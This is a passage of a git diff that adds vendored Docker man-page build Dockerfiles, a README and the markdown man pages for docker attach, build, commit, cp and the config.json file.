+        cd ${TARGET}/glide && \
+        git checkout $GLIDE && \
+        make build && \
+        cp ./glide /usr/bin/glide && \
+        cd / && rm -rf /go/src/* /go/bin/* /go/pkg/*
+
+COPY    glide.yaml /manvendor/
+COPY    glide.lock /manvendor/
+WORKDIR /manvendor/
+RUN     glide install && mv vendor src
+ENV     GOPATH=$GOPATH:/manvendor
+RUN     go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man
+
+WORKDIR /go/src/github.com/docker/docker/
+ENTRYPOINT ["man/generate.sh"]
diff --git a/vendor/github.com/docker/docker/man/Dockerfile.s390x b/vendor/github.com/docker/docker/man/Dockerfile.s390x
new file mode 100644
index 0000000000..d4bcf1da11
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/Dockerfile.s390x
@@ -0,0 +1,35 @@
+FROM    s390x/ubuntu:xenial
+
+RUN     apt-get update && apt-get install -y \
+        curl \
+        gcc \
+        git \
+        make \
+        tar
+
+ENV     GO_VERSION 1.7.5
+RUN     curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" \
+        | tar -xzC /usr/local
+ENV     PATH /usr/local/go/bin:$PATH
+ENV     GOPATH=/go
+
+RUN     mkdir -p /go/src /go/bin /go/pkg
+RUN     export GLIDE=v0.11.1; \
+        export TARGET=/go/src/github.com/Masterminds; \
+        mkdir -p ${TARGET} && \
+        git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \
+        cd ${TARGET}/glide && \
+        git checkout $GLIDE && \
+        make build && \
+        cp ./glide /usr/bin/glide && \
+        cd / && rm -rf /go/src/* /go/bin/* /go/pkg/*
+
+COPY    glide.yaml /manvendor/
+COPY    glide.lock /manvendor/
+WORKDIR /manvendor/
+RUN     glide install && mv vendor src
+ENV     GOPATH=$GOPATH:/manvendor
+RUN     go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man
+
+WORKDIR /go/src/github.com/docker/docker/
+ENTRYPOINT ["man/generate.sh"]
diff --git a/vendor/github.com/docker/docker/man/README.md b/vendor/github.com/docker/docker/man/README.md
new file mode 100644
index 0000000000..82dac650f9
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/README.md
@@ -0,0 +1,15 @@
+Docker Documentation
+====================
+
+This directory contains scripts for generating the man pages. Many of the man
+pages are generated directly from the `spf13/cobra` `Command` definition. Some
+legacy pages are still generated from the markdown files in this directory.
+Do *not* edit the man pages in the man1 directory. Instead, update the
+Cobra command or amend the Markdown files for legacy pages.
+
+
+## Generate the man pages
+
+From within the project root directory run:
+
+    make manpages
diff --git a/vendor/github.com/docker/docker/man/docker-attach.1.md b/vendor/github.com/docker/docker/man/docker-attach.1.md
new file mode 100644
index 0000000000..c39d1c9290
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-attach.1.md
@@ -0,0 +1,99 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-attach - Attach to a running container
+
+# SYNOPSIS
+**docker attach**
+[**--detach-keys**[=*[]*]]
+[**--help**]
+[**--no-stdin**]
+[**--sig-proxy**[=*true*]]
+CONTAINER
+
+# DESCRIPTION
+The **docker attach** command allows you to attach to a running container using
+the container's ID or name, either to view its ongoing output or to control it
+interactively.  You can attach to the same contained process multiple times
+simultaneously, screen sharing style, or quickly view the progress of your
+detached process.
+
+To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the
+container. You can detach from the container (and leave it running) using a
+configurable key sequence. The default sequence is `CTRL-p CTRL-q`. You
+configure the key sequence using the **--detach-keys** option or a configuration
+file. See **config-json(5)** for documentation on using a configuration file.
+
+It is forbidden to redirect the standard input of a `docker attach` command while
+attaching to a tty-enabled container (i.e.: launched with `-t`).
+
+# OPTIONS
+**--detach-keys**=""
+    Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+
+**--help**
+  Print usage statement
+
+**--no-stdin**=*true*|*false*
+   Do not attach STDIN. The default is *false*.
+
+**--sig-proxy**=*true*|*false*
+   Proxy all received signals to the process (non-TTY mode only). SIGCHLD, SIGKILL, and SIGSTOP are not proxied. The default is *true*.
+
+# Override the detach sequence
+
+If you want, you can configure an override the Docker key sequence for detach.
+This is useful if the Docker default sequence conflicts with key sequence you
+use for other applications. There are two ways to define your own detach key
+sequence, as a per-container override or as a configuration property on  your
+entire configuration.
+
+To override the sequence for an individual container, use the
+`--detach-keys="<sequence>"` flag with the `docker attach` command. The format of
+the `<sequence>` is either a letter [a-Z], or the `ctrl-` combined with any of
+the following:
+
+* `a-z` (a single lowercase alpha character )
+* `@` (at sign)
+* `[` (left bracket)
+* `\\` (two backward slashes)
+*  `_` (underscore)
+* `^` (caret)
+
+These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key
+sequences. To configure a different configuration default key sequence for all
+containers, see **docker(1)**.
+
+# EXAMPLES
+
+## Attaching to a container
+
+In this example the top command is run inside a container, from an image called
+fedora, in detached mode. The ID from the container is passed into the **docker
+attach** command:
+
+    # ID=$(sudo docker run -d fedora /usr/bin/top -b)
+    # sudo docker attach $ID
+    top - 02:05:52 up  3:05,  0 users,  load average: 0.01, 0.02, 0.05
+    Tasks:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
+    Cpu(s):  0.1%us,  0.2%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
+    Mem:    373572k total,   355560k used,    18012k free,    27872k buffers
+    Swap:   786428k total,        0k used,   786428k free,   221740k cached
+
+    PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
+    1 root      20   0 17200 1116  912 R    0  0.3   0:00.03 top
+
+    top - 02:05:55 up  3:05,  0 users,  load average: 0.01, 0.02, 0.05
+    Tasks:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
+    Cpu(s):  0.0%us,  0.2%sy,  0.0%ni, 99.8%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
+    Mem:    373572k total,   355244k used,    18328k free,    27872k buffers
+    Swap:   786428k total,        0k used,   786428k free,   221776k cached
+
+    PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
+    1 root      20   0 17208 1144  932 R    0  0.3   0:00.03 top
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-build.1.md b/vendor/github.com/docker/docker/man/docker-build.1.md
new file mode 100644
index 0000000000..4beee88e4a
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-build.1.md
@@ -0,0 +1,340 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-build - Build an image from a Dockerfile
+
+# SYNOPSIS
+**docker build**
+[**--build-arg**[=*[]*]]
+[**--cpu-shares**[=*0*]]
+[**--cgroup-parent**[=*CGROUP-PARENT*]]
+[**--help**]
+[**-f**|**--file**[=*PATH/Dockerfile*]]
+[**-squash**] *Experimental*
+[**--force-rm**]
+[**--isolation**[=*default*]]
+[**--label**[=*[]*]]
+[**--no-cache**]
+[**--pull**]
+[**--compress**]
+[**-q**|**--quiet**]
+[**--rm**[=*true*]]
+[**-t**|**--tag**[=*[]*]]
+[**-m**|**--memory**[=*MEMORY*]]
+[**--memory-swap**[=*LIMIT*]]
+[**--network**[=*"default"*]]
+[**--shm-size**[=*SHM-SIZE*]]
+[**--cpu-period**[=*0*]]
+[**--cpu-quota**[=*0*]]
+[**--cpuset-cpus**[=*CPUSET-CPUS*]]
+[**--cpuset-mems**[=*CPUSET-MEMS*]]
+[**--ulimit**[=*[]*]]
+PATH | URL | -
+
+# DESCRIPTION
+This will read the Dockerfile from the directory specified in **PATH**.
+It also sends any other files and directories found in the current
+directory to the Docker daemon. The contents of this directory would
+be used by **ADD** commands found within the Dockerfile.
+
+Warning, this will send a lot of data to the Docker daemon depending
+on the contents of the current directory. The build is run by the Docker
+daemon, not by the CLI, so the whole context must be transferred to the daemon. 
+The Docker CLI reports "Sending build context to Docker daemon" when the context is sent to
+the daemon.
+
+When the URL to a tarball archive or to a single Dockerfile is given, no context is sent from
+the client to the Docker daemon. In this case, the Dockerfile at the root of the archive and
+the rest of the archive will get used as the context of the build.  When a Git repository is
+set as the **URL**, the repository is cloned locally and then sent as the context.
+
+# OPTIONS
+**-f**, **--file**=*PATH/Dockerfile*
+   Path to the Dockerfile to use. If the path is a relative path and you are
+   building from a local directory, then the path must be relative to that
+   directory. If you are building from a remote URL pointing to either a
+   tarball or a Git repository, then the path must be relative to the root of
+   the remote context. In all cases, the file must be within the build context.
+   The default is *Dockerfile*.
+
+**--squash**=*true*|*false*
+   **Experimental Only**
+   Once the image is built, squash the new layers into a new image with a single
+   new layer. Squashing does not destroy any existing image, rather it creates a new
+   image with the content of the squshed layers. This effectively makes it look
+   like all `Dockerfile` commands were created with a single layer. The build
+   cache is preserved with this method.
+
+   **Note**: using this option means the new image will not be able to take
+   advantage of layer sharing with other images and may use significantly more
+   space.
+
+   **Note**: using this option you may see significantly more space used due to
+   storing two copies of the image, one for the build cache with all the cache
+   layers in tact, and one for the squashed version.
+
+**--build-arg**=*variable*
+   name and value of a **buildarg**.
+
+   For example, if you want to pass a value for `http_proxy`, use
+   `--build-arg=http_proxy="http://some.proxy.url"`
+
+   Users pass these values at build-time. Docker uses the `buildargs` as the
+   environment context for command(s) run via the Dockerfile's `RUN` instruction
+   or for variable expansion in other Dockerfile instructions. This is not meant
+   for passing secret values. [Read more about the buildargs instruction](https://docs.docker.com/engine/reference/builder/#arg)
+
+**--force-rm**=*true*|*false*
+   Always remove intermediate containers, even after unsuccessful builds. The default is *false*.
+
+**--isolation**="*default*"
+   Isolation specifies the type of isolation technology used by containers. 
+
+**--label**=*label*
+   Set metadata for an image
+
+**--no-cache**=*true*|*false*
+   Do not use cache when building the image. The default is *false*.
+
+**--help**
+  Print usage statement
+
+**--pull**=*true*|*false*
+   Always attempt to pull a newer version of the image. The default is *false*.
+
+**--compress**=*true*|*false*
+    Compress the build context using gzip. The default is *false*.
+
+**-q**, **--quiet**=*true*|*false*
+   Suppress the build output and print image ID on success. The default is *false*.
+
+**--rm**=*true*|*false*
+   Remove intermediate containers after a successful build. The default is *true*.
+
+**-t**, **--tag**=""
+   Repository names (and optionally with tags) to be applied to the resulting 
+   image in case of success. Refer to **docker-tag(1)** for more information
+   about valid tag names.
+
+**-m**, **--memory**=*MEMORY*
+  Memory limit
+
+**--memory-swap**=*LIMIT*
+   A limit value equal to memory plus swap. Must be used with the  **-m**
+(**--memory**) flag. The swap `LIMIT` should always be larger than **-m**
+(**--memory**) value.
+
+   The format of `LIMIT` is `<number>[<unit>]`. Unit can be `b` (bytes),
+`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a
+unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap.
+
+**--network**=*bridge*
+  Set the networking mode for the RUN instructions during build. Supported standard
+  values are: `bridge`, `host`, `none` and `container:<name|id>`. Any other value
+  is taken as a custom network's name or ID which this container should connect to.
+
+**--shm-size**=*SHM-SIZE*
+  Size of `/dev/shm`. The format is `<number><unit>`. `number` must be greater than `0`.
+  Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes.
+  If you omit the size entirely, the system uses `64m`.
+
+**--cpu-shares**=*0*
+  CPU shares (relative weight).
+
+  By default, all containers get the same proportion of CPU cycles.
+  CPU shares is a 'relative weight', relative to the default setting of 1024.
+  This default value is defined here: 
+  ```
+   cat /sys/fs/cgroup/cpu/cpu.shares
+   1024
+  ```
+  You can change this proportion by adjusting the container's CPU share 
+  weighting relative to the weighting of all other running containers.
+
+  To modify the proportion from the default of 1024, use the **--cpu-shares**
+  flag to set the weighting to 2 or higher.
+
+      Container   CPU share    Flag             
+      {C0}        60% of CPU  --cpu-shares=614 (614 is 60% of 1024)
+      {C1}        40% of CPU  --cpu-shares=410 (410 is 40% of 1024)
+
+  The proportion is only applied when CPU-intensive processes are running.
+  When tasks in one container are idle, the other containers can use the
+  left-over CPU time. The actual amount of CPU time used varies depending on
+  the number of containers running on the system.
+
+  For example, consider three containers, where one has **--cpu-shares=1024** and
+  two others have **--cpu-shares=512**. When processes in all three
+  containers attempt to use 100% of CPU, the first container would receive
+  50% of the total CPU time. If you add a fourth container with **--cpu-shares=1024**,
+  the first container only gets 33% of the CPU. The remaining containers
+  receive 16.5%, 16.5% and 33% of the CPU.
+
+
+      Container   CPU share   Flag                CPU time            
+      {C0}        100%        --cpu-shares=1024   33%
+      {C1}        50%         --cpu-shares=512    16.5%
+      {C2}        50%         --cpu-shares=512    16.5%
+      {C4}        100%        --cpu-shares=1024   33%
+
+
+  On a multi-core system, the shares of CPU time are distributed across the CPU
+  cores. Even if a container is limited to less than 100% of CPU time, it can
+  use 100% of each individual CPU core.
+
+  For example, consider a system with more than three cores. If you start one
+  container **{C0}** with **--cpu-shares=512** running one process, and another container
+  **{C1}** with **--cpu-shares=1024** running two processes, this can result in the following
+  division of CPU shares:
+
+      PID    container    CPU    CPU share
+      100    {C0}         0      100% of CPU0
+      101    {C1}         1      100% of CPU1
+      102    {C1}         2      100% of CPU2
+
+**--cpu-period**=*0*
+  Limit the CPU CFS (Completely Fair Scheduler) period.
+
+  Limit the container's CPU usage. This flag causes the kernel to restrict the
+  container's CPU usage to the period you specify.
+
+**--cpu-quota**=*0*
+  Limit the CPU CFS (Completely Fair Scheduler) quota. 
+
+  By default, containers run with the full CPU resource. This flag causes the
+kernel to restrict the container's CPU usage to the quota you specify.
+
+**--cpuset-cpus**=*CPUSET-CPUS*
+  CPUs in which to allow execution (0-3, 0,1).
+
+**--cpuset-mems**=*CPUSET-MEMS*
+  Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on
+  NUMA systems.
+
+  For example, if you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1`
+to ensure the processes in your Docker container only use memory from the first
+two memory nodes.
+
+**--cgroup-parent**=*CGROUP-PARENT*
+  Path to `cgroups` under which the container's `cgroup` are created.
+
+  If the path is not absolute, the path is considered relative to the `cgroups` path of the init process.
+Cgroups are created if they do not already exist.
+
+**--ulimit**=[]
+  Ulimit options
+
+  For more information about `ulimit` see [Setting ulimits in a 
+container](https://docs.docker.com/engine/reference/commandline/run/#set-ulimits-in-container---ulimit)
+
+# EXAMPLES
+
+## Building an image using a Dockerfile located inside the current directory
+
+Docker images can be built using the build command and a Dockerfile:
+
+    docker build .
+
+During the build process Docker creates intermediate images. In order to
+keep them, you must explicitly set `--rm=false`.
+
+    docker build --rm=false .
+
+A good practice is to make a sub-directory with a related name and create
+the Dockerfile in that directory. For example, a directory called mongo may
+contain a Dockerfile to create a Docker MongoDB image. Likewise, another
+directory called httpd may be used to store Dockerfiles for Apache web
+server images.
+
+It is also a good practice to add the files required for the image to the
+sub-directory. These files will then be specified with the `COPY` or `ADD`
+instructions in the `Dockerfile`.
+
+Note: If you include a tar file (a good practice), then Docker will
+automatically extract the contents of the tar file specified within the `ADD`
+instruction into the specified target.
+
+## Building an image and naming that image
+
+A good practice is to give a name to the image you are building. Note that 
+only a-z0-9-_. should be used for consistency.  There are no hard rules here but it is best to give the names consideration. 
+
+The **-t**/**--tag** flag is used to rename an image. Here are some examples:
+
+Though it is not a good practice, image names can be arbitrary:
+
+    docker build -t myimage .
+
+A better approach is to provide a fully qualified and meaningful repository,
+name, and tag (where the tag in this context means the qualifier after 
+the ":"). In this example we build a JBoss image for the Fedora repository 
+and give it the version 1.0:
+
+    docker build -t fedora/jboss:1.0 .
+
+The next example is for the "whenry" user repository and uses Fedora and
+JBoss and gives it the version 2.1 :
+
+    docker build -t whenry/fedora-jboss:v2.1 .
+
+If you do not provide a version tag then Docker will assign `latest`:
+
+    docker build -t whenry/fedora-jboss .
+
+When you list the images, the image above will have the tag `latest`.
+
+You can apply multiple tags to an image. For example, you can apply the `latest`
+tag to a newly built image and add another tag that references a specific
+version.
+For example, to tag an image both as `whenry/fedora-jboss:latest` and
+`whenry/fedora-jboss:v2.1`, use the following:
+
+    docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 .
+
+So renaming an image is arbitrary but consideration should be given to 
+a useful convention that makes sense for consumers and should also take
+into account Docker community conventions.
+
+
+## Building an image using a URL
+
+This will clone the specified GitHub repository from the URL and use it
+as context. The Dockerfile at the root of the repository is used as
+Dockerfile. This only works if the GitHub repository is a dedicated
+repository.
+
+    docker build github.com/scollier/purpletest
+
+Note: You can set an arbitrary Git repository via the `git://` scheme.
+
+## Building an image using a URL to a tarball'ed context
+
+This will send the URL itself to the Docker daemon. The daemon will fetch the
+tarball archive, decompress it and use its contents as the build context.  The 
+Dockerfile at the root of the archive and the rest of the archive will get used
+as the context of the build. If you pass an **-f PATH/Dockerfile** option as well,
+the system will look for that file inside the contents of the tarball.
+
+    docker build -f dev/Dockerfile https://10.10.10.1/docker/context.tar.gz
+
+Note: supported compression formats are 'xz', 'bzip2', 'gzip' and 'identity' (no compression).
+
+## Specify isolation technology for container (--isolation)
+
+This option is useful in situations where you are running Docker containers on
+Windows. The `--isolation=<value>` option sets a container's isolation
+technology. On Linux, the only supported is the `default` option which uses
+Linux namespaces. On Microsoft Windows, you can specify these values:
+
+* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value.
+* `process`: Namespace isolation only.
+* `hyperv`: Hyper-V hypervisor partition-based isolation.
+
+Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`.
+
+# HISTORY
+March 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+June 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-commit.1.md b/vendor/github.com/docker/docker/man/docker-commit.1.md
new file mode 100644
index 0000000000..d8a4cf8387
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-commit.1.md
@@ -0,0 +1,71 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-commit - Create a new image from a container's changes
+
+# SYNOPSIS
+**docker commit**
+[**-a**|**--author**[=*AUTHOR*]]
+[**-c**|**--change**[=\[*DOCKERFILE INSTRUCTIONS*\]]]
+[**--help**]
+[**-m**|**--message**[=*MESSAGE*]]
+[**-p**|**--pause**[=*true*]]
+CONTAINER [REPOSITORY[:TAG]]
+
+# DESCRIPTION
+Create a new image from an existing container specified by name or
+container ID.  The new image will contain the contents of the
+container filesystem, *excluding* any data volumes. Refer to **docker-tag(1)**
+for more information about valid image and tag names.
+
+While the `docker commit` command is a convenient way of extending an
+existing image, you should prefer the use of a Dockerfile and `docker
+build` for generating images that you intend to share with other
+people.
+
+# OPTIONS
+**-a**, **--author**=""
+   Author (e.g., "John Hannibal Smith <hannibal@a-team.com>")
+
+**-c** , **--change**=[]
+   Apply specified Dockerfile instructions while committing the image
+   Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR`
+
+**--help**
+  Print usage statement
+
+**-m**, **--message**=""
+   Commit message
+
+**-p**, **--pause**=*true*|*false*
+   Pause container during commit. The default is *true*.
+
+# EXAMPLES
+
+## Creating a new image from an existing container
+An existing Fedora based container has had Apache installed while running
+in interactive mode with the bash shell. Apache is also running. To
+create a new image run `docker ps` to find the container's ID and then run:
+
+    # docker commit -m="Added Apache to Fedora base image" \
+      -a="A D Ministrator" 98bd7fc99854 fedora/fedora_httpd:20
+
+Note that only a-z0-9-_. are allowed when naming images from an 
+existing container.
+
+## Apply specified Dockerfile instructions while committing the image
+If an existing container was created without the DEBUG environment
+variable set to "true", you can create a new image based on that
+container by first getting the container's ID with `docker ps` and
+then running:
+
+    # docker commit -c="ENV DEBUG true" 98bd7fc99854 debug-image
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and in
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+Oct 2014, updated by Daniel, Dao Quang Minh <daniel at nitrous dot io>
+June 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-config-json.5.md b/vendor/github.com/docker/docker/man/docker-config-json.5.md
new file mode 100644
index 0000000000..49987f08b8
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-config-json.5.md
@@ -0,0 +1,72 @@
+% CONFIG.JSON(5) Docker User Manuals
+% Docker Community
+% JANUARY 2016
+# NAME
+HOME/.docker/config.json - Default Docker configuration file
+
+# INTRODUCTION
+
+By default, the Docker command line stores its configuration files in a
+directory called `.docker` within your `$HOME` directory.  Docker manages most of
+the files in the configuration directory and you should not modify them.
+However, you *can modify* the `config.json` file to control certain aspects of
+how the `docker` command behaves.
+
+Currently, you can modify the `docker` command behavior using environment
+variables or command-line options. You can also use options within
+`config.json` to modify some of the same behavior. When using these
+mechanisms, you must keep in mind the order of precedence among them. Command
+line options override environment variables and environment variables override
+properties you specify in a `config.json` file.
+
+The `config.json` file stores a JSON encoding of several properties:
+
+* The `HttpHeaders` property specifies a set of headers to include in all messages
+sent from the Docker client to the daemon. Docker does not try to interpret or
+understand these header; it simply puts them into the messages. Docker does not
+allow these headers to change any headers it sets for itself.
+
+* The `psFormat` property specifies the default format for `docker ps` output.
+When the `--format` flag is not provided with the `docker ps` command,
+Docker's client uses this property. If this property is not set, the client
+falls back to the default table format. For a list of supported formatting
+directives, see **docker-ps(1)**.
+
+* The `detachKeys` property specifies the default key sequence which
+detaches the container. When the `--detach-keys` flag is not provide
+with the `docker attach`, `docker exec`, `docker run` or `docker
+start`, Docker's client uses this property. If this property is not
+set, the client falls back to the default sequence `ctrl-p,ctrl-q`.
+
+
+* The `imagesFormat` property  specifies the default format for `docker images`
+output. When the `--format` flag is not provided with the `docker images`
+command, Docker's client uses this property. If this property is not set, the
+client falls back to the default table format. For a list of supported
+formatting directives, see **docker-images(1)**.
+
+You can specify a different location for the configuration files via the
+`DOCKER_CONFIG` environment variable or the `--config` command line option. If
+both are specified, then the `--config` option overrides the `DOCKER_CONFIG`
+environment variable:
+
+    docker --config ~/testconfigs/ ps
+
+This command instructs Docker to use the configuration files in the
+`~/testconfigs/` directory when running the `ps` command.
+
+## Examples
+
+Following is a sample `config.json` file:
+
+    {
+      "HttpHeaders": {
+        "MyHeader": "MyValue"
+      },
+      "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}",
+      "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}",
+      "detachKeys": "ctrl-e,e"
+    }
+
+# HISTORY
+January 2016, created by Moxiegirl <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-cp.1.md b/vendor/github.com/docker/docker/man/docker-cp.1.md
new file mode 100644
index 0000000000..949d60bb8b
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-cp.1.md
@@ -0,0 +1,175 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-cp - Copy files/folders between a container and the local filesystem.
+
+# SYNOPSIS
+**docker cp**
+[**--help**]
+CONTAINER:SRC_PATH DEST_PATH|-
+
+**docker cp**
+[**--help**]
+SRC_PATH|- CONTAINER:DEST_PATH
+
+# DESCRIPTION
+
+The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`.
+You can copy from the container's file system to the local machine or the
+reverse, from the local filesystem to the container. If `-` is specified for
+either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from
+`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container.
+The `SRC_PATH` or `DEST_PATH` can be a file or directory.
+
+The `docker cp` command assumes container paths are relative to the container's 
+`/` (root) directory. This means supplying the initial forward slash is optional; 
+The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and
+`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can
+be an absolute or relative value. The command interprets a local machine's
+relative paths as relative to the current working directory where `docker cp` is
+run.
+
+The `cp` command behaves like the Unix `cp -a` command in that directories are
+copied recursively with permissions preserved if possible. Ownership is set to
+the user and primary group at the destination. For example, files copied to a
+container are created with `UID:GID` of the root user. Files copied to the local
+machine are created with the `UID:GID` of the user which invoked the `docker cp`
+command.  If you specify the `-L` option, `docker cp` follows any symbolic link
+in the `SRC_PATH`. `docker cp` does *not* create parent directories for
+`DEST_PATH` if they do not exist.
+
+Assuming a path separator of `/`, a first argument of `SRC_PATH` and second
+argument of `DEST_PATH`, the behavior is as follows:
+
+- `SRC_PATH` specifies a file
+    - `DEST_PATH` does not exist
+        - the file is saved to a file created at `DEST_PATH`
+    - `DEST_PATH` does not exist and ends with `/`
+        - Error condition: the destination directory must exist.
+    - `DEST_PATH` exists and is a file
+        - the destination is overwritten with the source file's contents
+    - `DEST_PATH` exists and is a directory
+        - the file is copied into this directory using the basename from
+          `SRC_PATH`
+- `SRC_PATH` specifies a directory
+    - `DEST_PATH` does not exist
+        - `DEST_PATH` is created as a directory and the *contents* of the source
+           directory are copied into this directory
+    - `DEST_PATH` exists and is a file
+        - Error condition: cannot copy a directory to a file
+    - `DEST_PATH` exists and is a directory
+        - `SRC_PATH` does not end with `/.`
+            - the source directory is copied into this directory
+        - `SRC_PATH` does end with `/.`
+            - the *content* of the source directory is copied into this
+              directory
+
+The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above
+rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not
+the target, is copied by default. To copy the link target and not the link, 
+specify the `-L` option.
+
+A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can
+also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local
+machine, for example  `file:name.txt`. If you use a `:` in a local machine path,
+you must be explicit with a relative or absolute path, for example:
+
+    `/path/to/file:name.txt` or `./file:name.txt`
+
+It is not possible to copy certain system files such as resources under
+`/proc`, `/sys`, `/dev`, tmpfs, and mounts created by the user in the container.
+However, you can still copy such files by manually running `tar` in `docker exec`.
+For example (consider `SRC_PATH` and `DEST_PATH` are directories):
+
+    $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH -
+
+or
+
+    $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH -
+
+
+Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive.
+The command extracts the content of the tar to the `DEST_PATH` in container's
+filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as
+the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`.
+
+# OPTIONS
+**-L**, **--follow-link**=*true*|*false*
+  Follow symbol link in SRC_PATH
+
+**--help**
+  Print usage statement
+
+# EXAMPLES
+
+Suppose a container has finished producing some output as a file it saves
+to somewhere in its filesystem. This could be the output of a build job or
+some other computation. You can copy these outputs from the container to a
+location on your local host.
+
+If you want to copy the `/tmp/foo` directory from a container to the
+existing `/tmp` directory on your host. If you run `docker cp` in your `~`
+(home) directory on the local host:
+
+    $ docker cp compassionate_darwin:tmp/foo /tmp
+
+Docker creates a `/tmp/foo` directory on your host. Alternatively, you can omit
+the leading slash in the command. If you execute this command from your home
+directory:
+
+    $ docker cp compassionate_darwin:tmp/foo tmp
+
+If `~/tmp` does not exist, Docker will create it and copy the contents of
+`/tmp/foo` from the container into this new directory. If `~/tmp` already
+exists as a directory, then Docker will copy the contents of `/tmp/foo` from
+the container into a directory at `~/tmp/foo`.
+
+When copying a single file to an existing `LOCALPATH`, the `docker cp` command
+will either overwrite the contents of `LOCALPATH` if it is a file or place it
+into `LOCALPATH` if it is a directory, overwriting an existing file of the same
+name if one exists. For example, this command:
+
+    $ docker cp sharp_ptolemy:/tmp/foo/myfile.txt /test
+
+If `/test` does not exist on the local machine, it will be created as a file
+with the contents of `/tmp/foo/myfile.txt` from the container. If `/test`
+exists as a file, it will be overwritten. Lastly, if `/test` exists as a
+directory, the file will be copied to `/test/myfile.txt`.
+
+Next, suppose you want to copy a file or folder into a container. For example,
+this could be a configuration file or some other input to a long running
+computation that you would like to place into a created container before it
+starts. This is useful because it does not require the configuration file or
+other input to exist in the container image.
+
+If you have a file, `config.yml`, in the current directory on your local host
+and wish to copy it to an existing directory at `/etc/my-app.d` in a container,
+this command can be used:
+
+    $ docker cp config.yml myappcontainer:/etc/my-app.d
+
+If you have several files in a local directory `/config` which you need to copy
+to a directory `/etc/my-app.d` in a container:
+
+    $ docker cp /config/. myappcontainer:/etc/my-app.d
+
+The above command will copy the contents of the local `/config` directory into
+the directory `/etc/my-app.d` in the container.
+
+Finally, if you want to copy a symbolic link into a container, you typically
+want to  copy the linked target and not the link itself. To copy the target, use
+the `-L` option, for example:
+
+    $ ln -s /tmp/somefile /tmp/somefile.ln
+    $ docker cp -L /tmp/somefile.ln myappcontainer:/tmp/
+
+This command copies content of the local `/tmp/somefile` into the file
+`/tmp/somefile.ln` in the container. Without `-L` option, the `/tmp/somefile.ln`
+preserves its symbolic link but not its content.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+May 2015, updated by Josh Hawn <josh.hawn@docker.com>
